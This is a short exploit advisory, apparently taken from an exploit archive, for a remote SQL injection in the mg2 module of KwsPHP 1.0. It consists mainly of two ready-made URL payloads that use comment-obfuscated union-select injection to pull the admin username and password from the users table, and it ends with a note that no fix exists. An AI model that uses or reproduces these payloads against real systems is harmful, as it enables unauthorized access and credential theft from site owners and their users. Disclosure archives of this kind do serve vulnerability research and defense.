KwsPHP 1.0 mg2 Module Remote SQL Injection Vulnerability

2007-10-13 00:00:00

--------------------

KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit

--------------------

Found : xoron

--------------------

Exploit:

Name:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pseudo,3,4,5/**/from/**/users/**/where/**/id=1/*

Pass:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pass,3,4,5/**/from/**/users/**/where/**/id=1/*

--------------------

Bundan sonra hep tek, hep yek xoron..!

--------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.